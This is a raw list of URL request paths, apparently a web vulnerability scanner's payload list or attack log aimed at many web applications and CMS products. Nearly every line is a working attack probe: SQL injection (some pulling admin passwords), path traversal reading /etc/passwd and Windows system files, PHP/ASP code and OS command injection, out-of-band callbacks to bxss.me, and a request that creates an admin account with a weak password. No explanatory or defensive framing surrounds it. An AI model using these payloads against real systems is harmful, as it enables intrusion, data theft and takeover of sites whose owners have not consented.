/common/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/action.asp?act=$%7B@print(md5(1122))%7D
/common/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/action.asp?act=phpinfo
/views.asp
/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
/action.asp?act=%3C?exit(md5(1122));?%3E
/mfs.cgi
/action.asp?act='];print(md5(1122));//
/common/views.asp
/netflow/servlet/CSVServlet?schFilePath=/etc/passwd
/action.asp?act=%3C?php%20print(md5(1122));exit;?%3E
/netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini
/action.asp?act=die(md5($_get[scanner]));&scanner=1122
/action.asp?act=;$%7B@print(md5(1122))%7D;
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/action.asp?act=';?%3E%3C?exit(md5(1122));?%3E
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
/action.asp?act=%7Cping+-c+4+127.0.0.1
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/common/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/projects
/action.asp?act='%22%5C'%5C%22);%7C]*%7B%0d%0a%3C%00%3E%bf%27'
/common/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/redmine/
/action.asp?act=web2358%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9scan1122
/common//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/action.asp?act=%e2h
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/common/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/webfm/webUI/uistrings.cgi
/action.asp?act='%22()
/searchLines.aspx?LName=h%25';
/action.asp?act=%5c
/common/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/bugfree/install/index.php?action=upgraded
/action.asp?act=
/common/searchLines.aspx?LName=h%25';
/action.asp?act=http://hitBAo6EKQnyr.bxss.me/
/searchLines.aspx?LName=h&t=scanner()'
/action.asp?act=http://hitd0rQGQge8t.bxss.me/
/viewlist.aspx?typeid=scanner()'
/action.asp?act=http://testasp.vulnweb.com/t/fit.txt
/common/searchLines.aspx?LName=h&t=scanner()'
/secure/Signup!default.jspa
/action.asp?act=JUSTfind/../../xxx%5c..%5c..%5cJUSTfind
/common/viewlist.aspx?typeid=scanner()'
/action.asp?act=WEB-INF/web.xml
/action.asp?act=../../../../WEB-INF/web.xml
/reports/CreateReportTable.jsp?site=0
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/job/msearch-trunk/lastSuccessfulBuild/artifact/?pattern=C:/Windows/system.ini
/action.asp?act=set%7Cset&set
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/action.asp?act=%7Cping+-c+4+127.0.0.1
/common/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/common/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/action.asp?act=;/bin/cat%20/etc/passwd;
/portal/WEB-INF/web.xml
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/eassso/WEB-INF/web.xml
/action.asp?act=/bin/cat%20/etc/passwd
/common/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/action.asp?act=&&/bin/cat%20/etc/passwd&&
/WEB-INF/web.xml
/common/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/common/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/action.asp?act=%7C/bin/cat%20/etc/passwd%7C
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/action.asp?act=%60/bin/cat%20/etc/passwd%60
/admin/picupload.aspx
/action.asp?act=ping%20-c%205%20127.0.0.1
/common/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/action.asp?act=ping%20-n%205%20127.0.0.1
/manager/picupload.aspx
/action.asp?act=;ping%20-c%205%20127.0.0.1;
/common/admin/picupload.aspx
/common/manager/picupload.aspx
/action.asp?act=&&ping%20-c%205%20127.0.0.1&&
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/action.asp?act=%60ping%20-c%205%20127.0.0.1%60
/action.asp?act=%7Cping%20-c%205%20127.0.0.1%7C
/invoker/EJBInvokerServlet/
/action.asp?act=%22;/bin/cat%20/etc/passwd;%22
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/common/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/invoker/JMXInvokerServlet/
/action.asp?act=';/bin/cat%20/etc/passwd;'
/action.asp?act=%22;ping%20-c%205%20127.0.0.1;%22
/common/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/action.asp?act=';ping%20-c%205%20127.0.0.1;'
/action.asp?act=response.write(9412458*9542755)
/sysinfo.jsp
/action.asp?act=action.asp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/common/sysinfo.jsp
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/common/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/common/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/common/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/common/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/common/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/common/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/common/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/common/Article/?Type=18%20/**/and/**/1=char(106)--
/common/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/common/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/common/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/common/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/common/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/common/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/common/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/common/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/common/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/common/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/common/oa_server/App_Pages/App_page/user_list.aspx
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/common/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/common/venus/AsVenusCA/desk/message/reply.asp
/common/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/common/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/common/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/common/webUser/webUser!list.action
/admin/Admin_Config.asp
/common/admin/Admin_Config.asp
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/common/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/common/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/common/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/common/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/common/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/common/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/NewsList.asp
/common/ActivityList.asp
/common/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/Adminiscentertrator/AdmIndex.asp
/common/Adminiscentertrator/AdmIndex.asp
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/common/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/install/step4.aspx
/admin/Role/Role_List.aspx
/common/install/step4.aspx
/common/admin/Role/Role_List.aspx
/account.t?op=showAccountList
/oa_server/App_Pages/App_page/News_add.aspx
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/common/account.t?op=showAccountList
/common/oa_server/App_Pages/App_page/News_add.aspx
/common/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/outImg?imgPath=c:/boot.ini
/outImg?imgPath=/etc/passwd
/common/outImg?imgPath=c:/boot.ini
/common/outImg?imgPath=/etc/passwd
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/common/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/ProcManage/WebHouse/HousePic.aspx
/common/ProcManage/WebHouse/HousePic.aspx
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/common/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/common/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/common/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/common/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/common/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/main/
/common/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/common/main/
/cms/conf/system.xml
/common/cms/conf/system.xml
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/common/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/common/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/common/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/admin/backup.aspx
/common/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/common/admin/backup.aspx
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%28110%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/common/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%28110%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/admini/item/iteminfo.aspx
/common/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/admini/newstopic/newstopicinfo.aspx
/common/admini/item/iteminfo.aspx
/common/admini/newstopic/newstopicinfo.aspx
/tophp.asp
/common/tophp.asp
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/common/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/common/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/common/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/common/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/common/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/php/report/include/ldap.inc
/php/report/include/util.inc
/common/php/report/include/ldap.inc
/php/report/include/config.inc
/common/php/report/include/util.inc
/common/php/report/include/config.inc
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/common/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/download.action?filename=../../../../../../etc/passwd
/common/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/MockLogin.aspx
/common/download.action?filename=../../../../../../etc/passwd
/management/status.jsp
/common/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/common/MockLogin.aspx
/monitoring?part=web.xml
/common/management/status.jsp
/common/monitoring?part=web.xml
/admin/index.asp
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/common/admin/index.asp
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/common/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/common/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/common/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/common/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/common/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/common/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/common/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/emlib4/format/release/aspx/eml_userwh.aspx
/common/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/common/emlib4/format/release/aspx/eml_userwh.aspx
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/common/webConfigSet/configSetting.aspx?url=/login/index.aspx
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/common/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/common/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/common/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/common/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(110)%2bchar(101)%2bchar(114)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/common/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/common/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(110)%2bchar(101)%2bchar(114)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/common/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(110)%2bchar(101)%2bchar(114)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20char(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(110)%2bchar(101)%2bchar(114)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/common/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(110)%2bchar(101)%2bchar(114)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/common/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20char(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(110)%2bchar(101)%2bchar(114)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/common/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/common/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/managerNManager.action
/common/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(110)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/ModifyNewsAction.do?newsID=-12
/common/managerNManager.action
/common/ModifyNewsAction.do?newsID=-12
/admin/admin_adminmodifypwd.aspx
/common/admin/admin_adminmodifypwd.aspx
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/common/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/common/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%28110%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/common/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%28110%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/common/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/common/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/common/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/nicknamelogin.jsp
/common/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/common/nicknamelogin.jsp
/common/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(110)%2bCHAR(101)%2bCHAR(114)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/common/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(110)%2bCHAR(101)%2bCHAR(114)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/common/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
